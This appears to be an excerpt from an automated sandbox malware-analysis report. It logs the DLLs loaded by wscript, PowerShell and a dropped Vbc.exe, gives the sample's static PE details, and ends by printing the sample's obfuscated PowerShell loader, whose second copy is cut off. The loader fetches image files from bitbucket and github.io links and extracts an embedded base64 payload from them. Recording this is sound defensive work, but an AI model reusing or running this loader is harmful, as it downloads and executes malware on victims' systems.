            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeSection loaded: msvcp140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: Vbc.exe, 0000000B.00000000.2276937183.00000000001F1000.00000020.00000001.01000000.0000000A.sdmp, Vbc.exe.9.dr
            Source: Binary string: wextract.pdb source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
            Source: Binary string: wextract.pdbGCTL source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
            Source: Binary string: vbc.pdb source: Vbc.exe, 0000000B.00000000.2276937183.00000000001F1000.00000020.00000001.01000000.0000000A.sdmp, Vbc.exe.9.dr
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@Y